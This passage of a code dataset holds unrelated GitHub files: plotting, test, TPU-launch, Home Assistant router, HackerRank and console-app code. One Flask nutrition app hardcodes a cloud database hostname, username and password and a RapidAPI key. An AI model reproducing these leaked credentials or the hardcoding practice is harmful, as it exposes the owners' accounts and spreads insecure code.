alpha=syntax_alpha, outline=None)\n code_img = aoi_img.crop(crop_rect)\n\n # Add colorbar\n dpi = 90\n width, height = (0.25 * dpi), code_img.size[1]\n width_inches = width / float(dpi)\n height_inches = height / float(dpi)\n\n fig = pyplot.figure(figsize=(width_inches, height_inches), dpi=dpi, frameon=False)\n ax = pyplot.Axes(fig, [0, 0, 1, 1])\n ax.set_axis_off()\n fig.add_axes(ax)\n\n norm = matplotlib.colors.Normalize(vmin=min(code_counts),\n vmax=max_code_count)\n\n cb = matplotlib.colorbar.ColorbarBase(ax, cmap=cmap, norm=norm)\n #cb.set_label(\"Total Fixation Duration (ms)\")\n cb.outline.set_linewidth(0)\n\n # Convert plot to image\n plot_buffer = StringIO()\n fig.savefig(plot_buffer, format=\"png\", dpi=dpi)\n pyplot.close(fig)\n plot_buffer.pos = 0\n plot_img = Image.open(plot_buffer)\n\n # Combine AOI and colorbar images\n horz_padding = (0.25 * dpi)\n width = int(code_img.size[0] + horz_padding + plot_img.size[0])\n height = int(code_img.size[1])\n final_img = Image.new(\"RGBA\", (width, height), color=\"white\")\n final_img.paste(code_img, (0, 0))\n final_img.paste(plot_img, (int(horz_padding + code_img.size[0]), 0))\n\n return final_img\n\n\ndef fixation_heatmap(fixations, screen_image, alpha=0.7,\n dot_size=200, cmap=None, dpi=90):\n points = fixations[[\"fix_x\", \"fix_y\"]].values\n heatmap_data = make_heatmap(points, screen_image.size, dot_size)\n\n width, height = screen_image.size\n width_inches = width / float(dpi)\n height_inches = height / float(dpi)\n\n fig = pyplot.figure(figsize=(width_inches, height_inches), dpi=dpi, frameon=False)\n ax = pyplot.Axes(fig, [0, 0, 1, 1])\n ax.set_axis_off()\n fig.add_axes(ax)\n\n if cmap is None:\n cmap = pyplot.cm.get_cmap(\"jet\")\n cmap._init()\n alphas = np.abs(np.linspace(-1.0, 1.0, cmap.N))\n cmap._lut[:-3, -1] = alphas\n\n ax.imshow(heatmap_data.T, interpolation=\"none\", cmap=cmap)\n plot_buffer = StringIO()\n fig.savefig(plot_buffer, format=\"png\", dpi=dpi)\n pyplot.close(fig)\n plot_buffer.pos = 0\n heatmap_image = Image.open(plot_buffer)\n\n heatmap_alpha = heatmap_image.split()[3]\n heatmap_image.putalpha(ImageEnhance.Brightness(heatmap_alpha).enhance(alpha))\n\n return Image.composite(heatmap_image, screen_image, heatmap_image)\n\ndef join_vertical(images, fill=\"white\", spacing=10, line_width=1, line_color=\"black\"):\n width = max([img.size[0] for img in images])\n height = sum([img.size[1] for img in images]) + \\\n (spacing * (len(images) - 1)) + \\\n (line_width * (len(images) - 1))\n\n final_img = 
Image.new(\"RGBA\", (width, height), color=fill)\n\n # Paste images\n y = 0\n for img in images:\n final_img.paste(img, (0, y))\n y += img.size[1] + spacing + line_width\n\n # Draw lines\n draw = ImageDraw.Draw(final_img)\n y = 0\n for img in images:\n start_y = y\n y += img.size[1] + (spacing / 2) - (line_width / 2)\n draw.line((0, y, width, y), fill=line_color, width=line_width)\n y = start_y + img.size[1] + spacing + line_width\n\n del draw\n return final_img\n\n\ndef saccade_angle_plot(saccades, size=50, color=\"blue\",\n figsize=None, alpha=0.5):\n\n max_dist = float(saccades[\"dist_euclid\"].max())\n fig = pyplot.figure(figsize=figsize)\n ax = pyplot.subplot(111, polar=True)\n\n angles = []\n thetas = []\n for _, row in saccades.iterrows():\n x1, y1 = row[\"sacc_x1\"], row[\"sacc_y1\"]\n x2, y2 = row[\"sacc_x2\"], row[\"sacc_y2\"]\n dist = row[\"dist_euclid\"]\n\n angle = angle_between((x2 - x1, y1 - y2), (1, 0))\n if y1 < y2:\n angle = (2 * np.pi) - angle\n\n angles.append(angle)\n thetas.append(dist / max_dist) \n\n ax.scatter(angles, thetas, s=size, alpha=alpha, color=color)\n ax.set_yticklabels([])\n ax.set_ylim((0, 1.05))\n\n return ax\n\n#def saccade_angle_plot(saccades, size=250, color=\"blue\", bgcolor=\"white\",\n #outline=\"black\", center_color=\"white\", center_radius=2):\n #w, h = size, size\n #max_dist = saccades[\"dist_euclid\"].max()\n #scale = w / (2.0 * max_dist)\n\n #img = Image.new(\"RGBA\", (w, h), bgcolor)\n #draw = ImageDraw.Draw(img)\n #draw.ellipse((2, 2, w - 2, h - 2), outline=outline)\n\n #for _, row in saccades.iterrows():\n #x1, y1 = row[\"sacc_x1\"], row[\"sacc_y1\"]\n #x2, y2 = row[\"sacc_x2\"], row[\"sacc_y2\"]\n #dist = row[\"dist_euclid\"]\n #x = float(x2 - x1) * scale\n #y = float(y2 - y1) * scale\n #draw.line((w/2, h/2, w/2 + x, h/2 + y), fill=color)\n\n #if center_color is not None:\n #r = center_radius\n #draw.ellipse((w/2 - r, h/2 - r, w/2 + r, h/2 + r), fill=center_color)\n #del draw\n #return img\n\ndef transition_centrality_graph(trans_matrix, name_map=None,\n cmap=None, edge_cmap=None, node_size=1200, font_size=18,\n figsize=(10, 10),\n **kwargs):\n import networkx as nx\n graph = nx.DiGraph(trans_matrix)\n\n # Drop orphaned nodes (blank lines)\n for n in graph.nodes():\n if graph.degree(n) == 0:\n graph.remove_node(n)\n\n if name_map is not None:\n graph = nx.relabel_nodes(graph, name_map)\n\n bc = nx.betweenness_centrality(graph)\n sorted_bc = sorted(bc.items(), key=operator.itemgetter(1))\n\n min_bc = sorted_bc[0][1]\n max_bc = sorted_bc[-1][1]\n colors = [bc[n] for n in graph.nodes()]\n\n if cmap is None:\n cdict = {\n \"red\": ((0.0, 0.75, 0.75),\n (1.0, 1.0, 1.0)),\n\n \"green\": ((0.0, 0.0, 0.0),\n (0.75, 1.0, 1.0),\n (1.0, 1.0, 1.0)),\n\n \"blue\": ((0.0, 0.0, 0.0),\n (0.75, 0.0, 0.0),\n (1.0, 0.0, 0.0))\n }\n\n cmap = LinearSegmentedColormap(\"custom\", cdict)\n\n fig = pyplot.figure(figsize=figsize)\n ax = pyplot.Axes(fig, [0, 0, 1, 1])\n fig.add_axes(ax)\n ax.set_axis_off()\n nx.draw_networkx(graph, ax=ax, node_size=node_size,\n node_color=colors, cmap=cmap,\n vmin=min_bc, vmax=max_bc,\n linewidths=1.5, edge_color=\"gray\",\n **kwargs)\n\n return ax\n\ndef trans_steady_state(trans_matrix, name_map=None, ax=None,\n figsize=None, colors=None):\n if ax is None:\n fig, ax = pyplot.subplots(1, 1, figsize=figsize)\n\n if colors is None:\n colors = kelly_colors\n\n ss = steady_state(trans_matrix)\n if name_map is not None:\n names = [name_map[i] for i in range(len(ss))]\n else:\n names = range(len(ss))\n\n pandas.Series(ss, 
index=names).plot(kind=\"bar\", ax=ax, colors=colors)\n ax.set_title(\"Steady State Probabilities\")\n ax.set_xlabel(\"State\")\n ax.set_ylabel(\"Probability\")\n\n return ax\n","repo_name":"synesthesiam/eyecode","sub_path":"plot/_plot.py","file_name":"_plot.py","file_ext":"py","file_size_in_byte":40705,"program_lang":"python","lang":"en","doc_type":"code","stars":16,"dataset":"github-code","pt":"52"} +{"seq_id":"17663875524","text":"import pickle\nimport copy\nimport unittest\n\nfrom orangecontrib.text import tag\nfrom orangecontrib.text.corpus import Corpus\n\n\nclass POSTaggerTests(unittest.TestCase):\n def setUp(self):\n self.tagger = tag.AveragedPerceptronTagger()\n self.corpus = Corpus.from_file('deerwester')\n\n def test_POSTagger(self):\n result = self.tagger(self.corpus)\n self.assertTrue(hasattr(result, 'pos_tags'))\n for tokens, tags in zip(result.tokens, result.pos_tags):\n self.assertEqual(len(tokens), len(tags))\n\n def test_str(self):\n self.assertEqual('Averaged Perceptron Tagger', str(self.tagger))\n\n def test_preprocess(self):\n corpus = self.tagger(self.corpus)\n self.assertIsNotNone(corpus.pos_tags)\n self.assertEqual(len(corpus.used_preprocessor.preprocessors), 2)\n\n def test_can_deepcopy(self):\n copied = copy.deepcopy(self.tagger)\n self.assertTrue(all(\n copied(self.corpus).pos_tags == self.tagger(self.corpus).pos_tags))\n\n def test_can_pickle(self):\n loaded = pickle.loads(pickle.dumps(self.tagger))\n self.assertTrue(all(\n loaded(self.corpus).pos_tags == self.tagger(self.corpus).pos_tags))\n\n\nif __name__ == \"__main__\":\n unittest.main()\n","repo_name":"biolab/orange3-text","sub_path":"orangecontrib/text/tests/test_tags.py","file_name":"test_tags.py","file_ext":"py","file_size_in_byte":1262,"program_lang":"python","lang":"en","doc_type":"code","stars":118,"dataset":"github-code","pt":"52"} +{"seq_id":"12718566168","text":"import argparse\nimport dataclasses\nimport typing\nfrom netrc import netrc\n\nfrom tpucare import delete_all, exec_command, exec_on_tpu, send_to_tpu, start_multiple\n\nfrom src.context import DataContext\n\n_, _, wandb_key = netrc().authenticators(\"api.wandb.ai\")\nOLD_DATA_PATH = DataContext.path.replace(\"/\", \"\\\\/\")[:-1] # remove * at the end\n\n\n@dataclasses.dataclass\nclass Context:\n zone: str\n host: str\n sweep_id: str\n branch: str\n data_path: str\n\n\ndef start_fn(ctx: Context, worker: int):\n setup = f'(bash setup.sh ; sed -i \"s/{OLD_DATA_PATH}/{ctx.data_path}/g\" src/context.py; exit 0)'\n cmd = exec_command(repository=\"https://github.com/HomebrewNLP/HomebrewNLP-Jax\", wandb_key=wandb_key,\n setup_command=setup, run_command=f\"/home/ubuntu/.local/bin/wandb agent {ctx.sweep_id}\",\n branch=ctx.branch)\n send_to_tpu(ctx.host, ctx.zone, \"setup.sh\", cmd, worker)\n exec_on_tpu(ctx.host, ctx.zone, \"bash setup.sh\", worker)\n\n\ndef parse_args():\n parser = argparse.ArgumentParser()\n parser.add_argument(\"--tpus\", type=int, default=1, help=\"How many TPUs should be launched\")\n parser.add_argument(\"--tpu-version\", type=int, default=3, help=\"Which TPU version to create (v2-8 or v3-8)\")\n parser.add_argument(\"--prefix\", type=str, default=\"homebrewnlp-preemptible-tuning\", help=\"Name prefix for TPUs\")\n parser.add_argument(\"--zone\", type=str, default=\"europe-west4-a\", help=\"GCP Zone TPUs get created in\")\n parser.add_argument(\"--data-path\", type=str, default=\"gs://ggpt4/the-char-pile/\",\n help=\"Where the data is stored. 
Should be changed to a bucket in the correct region\")\n parser.add_argument(\"--sweep\", type=str, help=\"ID of the Weights and Biases sweep that'll be resumed\")\n parser.add_argument(\"--cleanup\", default=0, type=int,\n help=\"Instead of running something new, kill all tpus. 1 or 0 for y/n\")\n parser.add_argument(\"--preemptible\", default=1, type=int,\n help=\"Whether to create preemptible or non-preemptible TPUs\")\n parser.add_argument(\"--service-account\", type=str,\n help=\"Service account that controls permissions of TPU (for example, to ensure EU TPUs won't \"\n \"use US data)\")\n parser.add_argument(\"--branch\", type=str, help=\"Branch on github to use\")\n parser.add_argument(\"--slices\", type=int, help=\"How many TPU slices each TPU should have (1=>vX-8, 4=>vX-32)\")\n args = parser.parse_args()\n return (args.tpus, args.tpu_version, args.prefix, args.zone, args.sweep, args.data_path, bool(args.cleanup),\n bool(args.preemptible), args.service_account, args.branch, args.slices)\n\n\ndef main():\n (tpus, tpu_version, prefix, zone, sweep_id, data_path, cleanup, preemptible,\n service_account, branch, slices) = parse_args()\n if cleanup:\n return delete_all(prefix, zone)\n\n def creation_callback(host: str, ctx: typing.Optional[Context]) -> Context:\n if ctx is None:\n return Context(zone=zone, host=host, sweep_id=sweep_id, data_path=data_path, branch=branch)\n return ctx\n\n start_multiple(prefix, tpu_version, zone, preemptible, service_account, slices, start_fn, creation_callback, tpus)\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"HomebrewNLP/Olmax","sub_path":"script/launch_multiple_runs.py","file_name":"launch_multiple_runs.py","file_ext":"py","file_size_in_byte":3311,"program_lang":"python","lang":"en","doc_type":"code","stars":38,"dataset":"github-code","pt":"52"} +{"seq_id":"37544635260","text":"\"\"\"Represent the AsusWrt router.\"\"\"\nfrom datetime import datetime, timedelta\nimport logging\nfrom typing import Any, Dict, Optional\n\nfrom aioasuswrt.asuswrt import AsusWrt\n\nfrom homeassistant.components.device_tracker.const import (\n CONF_CONSIDER_HOME,\n DEFAULT_CONSIDER_HOME,\n DOMAIN as TRACKER_DOMAIN,\n)\nfrom homeassistant.config_entries import ConfigEntry\nfrom homeassistant.const import (\n CONF_HOST,\n CONF_MODE,\n CONF_PASSWORD,\n CONF_PORT,\n CONF_PROTOCOL,\n CONF_USERNAME,\n)\nfrom homeassistant.core import CALLBACK_TYPE, callback\nfrom homeassistant.exceptions import ConfigEntryNotReady\nfrom homeassistant.helpers.dispatcher import async_dispatcher_send\nfrom homeassistant.helpers.event import async_track_time_interval\nfrom homeassistant.helpers.typing import HomeAssistantType\nfrom homeassistant.util import dt as dt_util\n\nfrom .const import (\n CONF_DNSMASQ,\n CONF_INTERFACE,\n CONF_REQUIRE_IP,\n CONF_SSH_KEY,\n CONF_TRACK_UNKNOWN,\n DEFAULT_DNSMASQ,\n DEFAULT_INTERFACE,\n DEFAULT_TRACK_UNKNOWN,\n DOMAIN,\n PROTOCOL_TELNET,\n)\n\nCONF_REQ_RELOAD = [CONF_DNSMASQ, CONF_INTERFACE, CONF_REQUIRE_IP]\nSCAN_INTERVAL = timedelta(seconds=30)\n\n_LOGGER = logging.getLogger(__name__)\n\n\nclass AsusWrtDevInfo:\n \"\"\"Representation of a AsusWrt device info.\"\"\"\n\n def __init__(self, mac, name=None):\n \"\"\"Initialize a AsusWrt device info.\"\"\"\n self._mac = mac\n self._name = name\n self._ip_address = None\n self._last_activity = None\n self._connected = False\n\n def update(self, dev_info=None, consider_home=0):\n \"\"\"Update AsusWrt device info.\"\"\"\n utc_point_in_time = dt_util.utcnow()\n if dev_info:\n if not self._name:\n self._name 
= dev_info.name or self._mac.replace(\":\", \"_\")\n self._ip_address = dev_info.ip\n self._last_activity = utc_point_in_time\n self._connected = True\n\n elif self._connected:\n self._connected = (\n utc_point_in_time - self._last_activity\n ).total_seconds() < consider_home\n self._ip_address = None\n\n @property\n def is_connected(self):\n \"\"\"Return connected status.\"\"\"\n return self._connected\n\n @property\n def mac(self):\n \"\"\"Return device mac address.\"\"\"\n return self._mac\n\n @property\n def name(self):\n \"\"\"Return device name.\"\"\"\n return self._name\n\n @property\n def ip_address(self):\n \"\"\"Return device ip address.\"\"\"\n return self._ip_address\n\n @property\n def last_activity(self):\n \"\"\"Return device last activity.\"\"\"\n return self._last_activity\n\n\nclass AsusWrtRouter:\n \"\"\"Representation of a AsusWrt router.\"\"\"\n\n def __init__(self, hass: HomeAssistantType, entry: ConfigEntry) -> None:\n \"\"\"Initialize a AsusWrt router.\"\"\"\n self.hass = hass\n self._entry = entry\n\n self._api: AsusWrt = None\n self._protocol = entry.data[CONF_PROTOCOL]\n self._host = entry.data[CONF_HOST]\n\n self._devices: Dict[str, Any] = {}\n self._connect_error = False\n\n self._on_close = []\n\n self._options = {\n CONF_DNSMASQ: DEFAULT_DNSMASQ,\n CONF_INTERFACE: DEFAULT_INTERFACE,\n CONF_REQUIRE_IP: True,\n }\n self._options.update(entry.options)\n\n async def setup(self) -> None:\n \"\"\"Set up a AsusWrt router.\"\"\"\n self._api = get_api(self._entry.data, self._options)\n\n try:\n await self._api.connection.async_connect()\n except OSError as exp:\n raise ConfigEntryNotReady from exp\n\n if not self._api.is_connected:\n raise ConfigEntryNotReady\n\n # Load tracked entities from registry\n entity_registry = await self.hass.helpers.entity_registry.async_get_registry()\n track_entries = (\n self.hass.helpers.entity_registry.async_entries_for_config_entry(\n entity_registry, self._entry.entry_id\n )\n )\n for entry in track_entries:\n if entry.domain == TRACKER_DOMAIN:\n self._devices[entry.unique_id] = AsusWrtDevInfo(\n entry.unique_id, entry.original_name\n )\n\n # Update devices\n await self.update_devices()\n\n self.async_on_close(\n async_track_time_interval(self.hass, self.update_all, SCAN_INTERVAL)\n )\n\n async def update_all(self, now: Optional[datetime] = None) -> None:\n \"\"\"Update all AsusWrt platforms.\"\"\"\n await self.update_devices()\n\n async def update_devices(self) -> None:\n \"\"\"Update AsusWrt devices tracker.\"\"\"\n new_device = False\n _LOGGER.debug(\"Checking devices for ASUS router %s\", self._host)\n try:\n wrt_devices = await self._api.async_get_connected_devices()\n except OSError as exc:\n if not self._connect_error:\n self._connect_error = True\n _LOGGER.error(\n \"Error connecting to ASUS router %s for device update: %s\",\n self._host,\n exc,\n )\n return\n\n if self._connect_error:\n self._connect_error = False\n _LOGGER.info(\"Reconnected to ASUS router %s\", self._host)\n\n consider_home = self._options.get(\n CONF_CONSIDER_HOME, DEFAULT_CONSIDER_HOME.total_seconds()\n )\n track_unknown = self._options.get(CONF_TRACK_UNKNOWN, DEFAULT_TRACK_UNKNOWN)\n\n for device_mac in self._devices:\n dev_info = wrt_devices.get(device_mac)\n self._devices[device_mac].update(dev_info, consider_home)\n\n for device_mac, dev_info in wrt_devices.items():\n if device_mac in self._devices:\n continue\n if not track_unknown and not dev_info.name:\n continue\n new_device = True\n device = AsusWrtDevInfo(device_mac)\n 
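Editor's aside on AsusWrtDevInfo.update above: the consider_home argument gives a device that vanished from the router's client list a grace period before is_connected flips to False. A minimal sketch of that behavior follows; it is not part of the integration, and the DevInfo namedtuple is a hypothetical stand-in for the device object aioasuswrt returns.

```python
# Editorial sketch of the consider_home grace period (assumes Home Assistant
# and this component are importable; DevInfo is a made-up stand-in with the
# .name/.ip attributes that AsusWrtDevInfo.update() reads).
from collections import namedtuple

from homeassistant.components.asuswrt.router import AsusWrtDevInfo

DevInfo = namedtuple("DevInfo", ["name", "ip"])

device = AsusWrtDevInfo(mac="AA:BB:CC:DD:EE:FF")
device.update(DevInfo(name="laptop", ip="192.168.1.10"))
assert device.is_connected  # seen in the router's client list

# Missing from the latest poll, but still within the grace period:
device.update(dev_info=None, consider_home=180)
assert device.is_connected  # last activity was less than 180 s ago
```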
device.update(dev_info)\n self._devices[device_mac] = device\n\n async_dispatcher_send(self.hass, self.signal_device_update)\n if new_device:\n async_dispatcher_send(self.hass, self.signal_device_new)\n\n async def close(self) -> None:\n \"\"\"Close the connection.\"\"\"\n if self._api is not None:\n if self._protocol == PROTOCOL_TELNET:\n self._api.connection.disconnect()\n self._api = None\n\n for func in self._on_close:\n func()\n self._on_close.clear()\n\n @callback\n def async_on_close(self, func: CALLBACK_TYPE) -> None:\n \"\"\"Add a function to call when router is closed.\"\"\"\n self._on_close.append(func)\n\n def update_options(self, new_options: Dict) -> bool:\n \"\"\"Update router options.\"\"\"\n req_reload = False\n for name, new_opt in new_options.items():\n if name in (CONF_REQ_RELOAD):\n old_opt = self._options.get(name)\n if not old_opt or old_opt != new_opt:\n req_reload = True\n break\n\n self._options.update(new_options)\n return req_reload\n\n @property\n def signal_device_new(self) -> str:\n \"\"\"Event specific per AsusWrt entry to signal new device.\"\"\"\n return f\"{DOMAIN}-device-new\"\n\n @property\n def signal_device_update(self) -> str:\n \"\"\"Event specific per AsusWrt entry to signal updates in devices.\"\"\"\n return f\"{DOMAIN}-device-update\"\n\n @property\n def host(self) -> str:\n \"\"\"Return router hostname.\"\"\"\n return self._host\n\n @property\n def devices(self) -> Dict[str, Any]:\n \"\"\"Return devices.\"\"\"\n return self._devices\n\n @property\n def api(self) -> AsusWrt:\n \"\"\"Return router API.\"\"\"\n return self._api\n\n\ndef get_api(conf: Dict, options: Optional[Dict] = None) -> AsusWrt:\n \"\"\"Get the AsusWrt API.\"\"\"\n opt = options or {}\n\n return AsusWrt(\n conf[CONF_HOST],\n conf[CONF_PORT],\n conf[CONF_PROTOCOL] == PROTOCOL_TELNET,\n conf[CONF_USERNAME],\n conf.get(CONF_PASSWORD, \"\"),\n conf.get(CONF_SSH_KEY, \"\"),\n conf[CONF_MODE],\n opt.get(CONF_REQUIRE_IP, True),\n interface=opt.get(CONF_INTERFACE, DEFAULT_INTERFACE),\n dnsmasq=opt.get(CONF_DNSMASQ, DEFAULT_DNSMASQ),\n )\n","repo_name":"fpetillo/home-assistant","sub_path":"homeassistant/components/asuswrt/router.py","file_name":"router.py","file_ext":"py","file_size_in_byte":8382,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"43181823554","text":"from flask import Flask, render_template, request\r\nimport os\r\nimport numpy as np\r\nfrom tensorflow.keras.models import load_model\r\nfrom tensorflow.keras.preprocessing import image\r\nfrom flask import session\r\nfrom flask import Flask, redirect, url_for\r\nimport requests\r\nimport json\r\nimport ibm_db\r\n\r\napp = Flask(__name__, template_folder=\"templates\")\r\napp.secret_key = 'NutritionAnalyzer'\r\nmodel = load_model('NutritionAnalyser.h5')\r\n\r\ndef connectToDB():\r\n try:\r\n connection = ibm_db.connect(\"DATABASE=bludb;\\\r\n HOSTNAME=125f9f61-9715-46f9-9399-c8177b21803b.c1ogj3sd0tgtu0lqde00.databases.appdomain.cloud;\\\r\n PORT=30426;\\\r\n Security=SSL;\\\r\n SSLServerCertificate=DigiCertGlobalRootCA.crt;\\\r\n UID=qlj81410;\\\r\n PWD=phBPVWNuoifGiYIC;\", \"\", \"\")\r\n print(\"Connected to DB!\")\r\n return connection\r\n except:\r\n print(\"error while connecting \", ibm_db.conn_errormsg())\r\n return 0\r\n\r\n\r\nconnection = connectToDB()\r\n\r\n@app.route('/Classify')\r\ndef index():\r\n return render_template('classify.html')\r\n\r\n@app.route(\"/\")\r\n@app.route('/home')\r\ndef home():\r\n return 
render_template('home.html')\r\n\r\n\r\n@app.route('/predict', methods=['GET', 'POST'])\r\ndef predict():\r\n if request.method == 'POST':\r\n f = request.files['file']\r\n basepath = os.path.dirname(__file__)\r\n filepath = os.path.join(basepath, \"test\", f.filename)\r\n f.save(filepath)\r\n\r\n img = image.load_img(filepath, target_size=(64, 64))\r\n x = image.img_to_array(img)\r\n x = np.expand_dims(x, axis=0)\r\n\r\n pred = np.argmax(model.predict(x), axis=1)\r\n index = ['APPLES', 'BANANA', 'ORANGE', 'PINEAPPLE', 'WATERMELON']\r\n\r\n predictedValue = str(index[pred[0]])\r\n\r\n result = nutrition(predictedValue)\r\n\r\n\r\n temp = result.json()[\"items\"]\r\n items = temp[0]\r\n print(items)\r\n sugar = items[\"sugar_g\"]\r\n fiber = items[\"fiber_g\"]\r\n sodium = items[\"sodium_mg\"]\r\n potassium = items[\"potassium_mg\"]\r\n fat_saturated = items[\"fat_saturated_g\"]\r\n fat_total = items[\"fat_total_g\"]\r\n calories = items[\"calories\"]\r\n cholesterol = items[\"cholesterol_mg\"]\r\n protein = items[\"protein_g\"]\r\n carbohydrates = items[\"carbohydrates_total_g\"]\r\n return render_template(\"result.html\", name=(predictedValue), sugar=(sugar), fiber=(fiber), sodium=(sodium), potassium=(potassium), fat_saturated=(fat_saturated), fat_total=(fat_total), calories=(calories), cholesterol=(cholesterol), protein=(protein), carbohydrates=(carbohydrates))\r\n\r\n\r\ndef nutrition(index):\r\n\r\n url = \"https://calorieninjas.p.rapidapi.com/v1/nutrition\"\r\n\r\n querystring = {\"query\": index}\r\n\r\n headers = {\r\n 'x-rapidapi-key': \"5d797ab107mshe668f26bd044e64p1ffd34jsnf47bfa9a8ee4\",\r\n 'x-rapidapi-host': \"calorieninjas.p.rapidapi.com\"\r\n }\r\n\r\n response = requests.request(\r\n \"GET\", url, headers=headers, params=querystring)\r\n\r\n print(\"from api \"+response.text)\r\n return response\r\n\r\n\r\nif __name__ == \"__main__\":\r\n app.run(debug=False)\r\n","repo_name":"IBM-EPBL/IBM-Project-33204-1660215949","sub_path":"Final Deliveribles/Web Application/app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":3110,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"3630627040","text":"#!/bin/python3\n\nimport math\nimport os\nimport random\nimport re\nimport sys\n\n\n# Complete the minimumBribes function below.\ndef minimumBribes(q):\n org_list = []\n for index in range(len(q)):\n org_list.append((q[index], index))\n\n org_list.sort(key=lambda u: u[0])\n count = 0\n for i in range(len(q)):\n j_index = 0\n for j in range(i, len(q)):\n if org_list[j][1] == i:\n j_index = j\n break\n\n if j_index - i > 2:\n count = sys.maxsize\n break\n count += j_index - i\n tmp = j_index\n while tmp != i:\n org_list[tmp], org_list[tmp - 1] = org_list[tmp - 1], org_list[tmp]\n tmp -= 1\n\n if count == sys.maxsize:\n print(\"Too chaotic\")\n else:\n print(count)\n\n\nif __name__ == '__main__':\n t = int(input())\n\n for t_itr in range(t):\n n = int(input())\n\n q = list(map(int, input().rstrip().split()))\n\n minimumBribes(q)\n","repo_name":"encgoo/hackerrank","sub_path":"ConstructiveAlgorithms/new_year_chaos.py","file_name":"new_year_chaos.py","file_ext":"py","file_size_in_byte":985,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"71738632805","text":"from exporters.groupers.base_grouper import BaseGrouper\nfrom exporters.utils import str_list\n\n\nclass FileKeyGrouper(BaseGrouper):\n \"\"\"\n Groups items depending on their keys. 
It adds the group membership information to items.\n\n - keys (list)\n A list of keys to group by\n \"\"\"\n supported_options = {\n 'keys': {'type': str_list}\n }\n\n def __init__(self, *args, **kwargs):\n super(FileKeyGrouper, self).__init__(*args, **kwargs)\n self.keys = self.read_option('keys', [])\n\n def _get_nested_value(self, item, key):\n if '.' in key:\n first_key, rest = key.split('.', 1)\n return self._get_nested_value(item.get(first_key, {}), rest)\n else:\n membership = item.get(key, 'unknown')\n if membership is None:\n membership = 'unknown'\n return membership\n\n def group_batch(self, batch):\n for item in batch:\n item.group_key = self.keys\n membership = []\n for key in self.keys:\n membership.append(self._get_nested_value(item, key))\n item.group_membership = tuple(membership)\n yield item\n","repo_name":"scrapinghub/exporters","sub_path":"exporters/groupers/file_key_grouper.py","file_name":"file_key_grouper.py","file_ext":"py","file_size_in_byte":1187,"program_lang":"python","lang":"en","doc_type":"code","stars":40,"dataset":"github-code","pt":"52"} +{"seq_id":"6837577879","text":"import time\nfrom selenium.common.exceptions import NoSuchElementException\n\ndef test_button_is_exist(browser):\n link = \"http://selenium1py.pythonanywhere.com/catalogue/coders-at-work_207/\"\n browser.get(link)\n try:\n browser.find_element_by_xpath(\"//button[@class='btn btn-lg btn-primary btn-add-to-basket']\")\n except NoSuchElementException:\n assert False, \"button is not exist\"\n\n time.sleep(30)","repo_name":"Inna666/stepic_course_3_6","sub_path":"test_items.py","file_name":"test_items.py","file_ext":"py","file_size_in_byte":421,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"32193162708","text":"from collections import Counter\n\nnum_cases = int(input())\n\n\ndef beautifulCounter(tower_colors):\n beautiful_counter = 0\n for i in range(0, len(tower_colors) - 1):\n if tower_colors[i] != tower_colors[i+1]:\n beautiful_counter += 1\n return beautiful_counter\n\n\ndef colorCounter(tower1_colors, tower2_colors):\n rCounter = 0\n bCounter = 0\n\n rCounter = Counter(tower1_colors) + Counter(tower2_colors)\n bCounter = Counter(tower1_colors) + Counter(tower2_colors)\n\n x = abs(rCounter['R'] - bCounter['B'])\n return x\n\n\nfor i in range(0, num_cases):\n check = 0\n tower1_size, tower2_size = input().split()\n tower1_colors = input()\n tower2_colors = input()\n\n if (len(tower1_colors) != 1 or len(tower2_colors) != 1):\n check = colorCounter(tower1_colors, tower2_colors)\n\n if check > 1:\n print('NO')\n\n else:\n beautiful_counter = beautifulCounter(\n tower1_colors) + beautifulCounter(tower2_colors)\n\n if beautiful_counter == (len(tower1_colors) - 1) + (len(tower2_colors)-1):\n print('YES')\n elif tower1_colors[len(tower1_colors)-1] != tower2_colors[len(tower2_colors)-1]:\n print('YES')\n else:\n print('NO')\n","repo_name":"Vinicius203/Codeforces","sub_path":"tempCodeRunnerFile.py","file_name":"tempCodeRunnerFile.py","file_ext":"py","file_size_in_byte":1237,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"71738632805","text":"from .common import Window\nfrom .matrix import CharMap\n\nimport win32con\nimport win32file\nfrom win32console import *\n\nfrom time import sleep\n\n\nclass Application:\n def __init__(self, shell):\n self.shell = shell\n\n self.console = PyConsoleScreenBufferType(win32file.CreateFile(\n \"CONIN$\",\n win32con.GENERIC_READ | 
win32con.GENERIC_WRITE,\n win32con.FILE_SHARE_READ,\n None,\n win32con.OPEN_EXISTING,\n 0,\n 0\n ))\n self.console.SetConsoleMode(ENABLE_WINDOW_INPUT | ENABLE_MOUSE_INPUT)\n self.buffer = CreateConsoleScreenBuffer()\n self.buffer.SetConsoleActiveScreenBuffer()\n\n size, _ = self.buffer.GetConsoleCursorInfo()\n self.buffer.SetConsoleCursorInfo(size, False)\n\n self.matrix = CharMap(self.w, self.h)\n self.mpos = (0, 0) # mouse position\n\n def exit(self):\n size, _ = self.buffer.GetConsoleCursorInfo()\n self.buffer.SetConsoleCursorInfo(size, True)\n\n self.buffer.Close()\n\n @property\n def w(self):\n return self.buffer.GetConsoleScreenBufferInfo()[\"Size\"].X\n\n @property\n def h(self):\n return self.buffer.GetConsoleScreenBufferInfo()[\"Size\"].Y\n\n def inputs(self):\n while self.shell.go:\n # poll for events before blocking and getting them\n # because the block prevents output from showing up\n while self.console.GetNumberOfConsoleInputEvents() < 1:\n sleep(0.01)\n\n for input in self.console.ReadConsoleInput(1):\n if input.EventType == KEY_EVENT:\n if input.KeyDown:\n if input.Char == '\\0':\n pass # FIXME - virtual key\n\n elif input.Char == '\\x03': # ctrl-c\n raise KeyboardInterrupt()\n\n else:\n self.shell.on_key(ord(input.Char))\n\n elif input.EventType == MOUSE_EVENT:\n flags = input.EventFlags # 1=push, 2=click, 4=scroll\n pos = input.MousePosition\n btn = input.ButtonState\n scroll = -1 if btn & 4287102976 == 4287102976 else \\\n 1 if btn & 7864320 == 7864320 else 0\n\n if not scroll: # mouse position not reliable while scrolling\n self.mpos = (pos.X, pos.Y)\n\n self.shell.on_mouse(self.mpos[0], 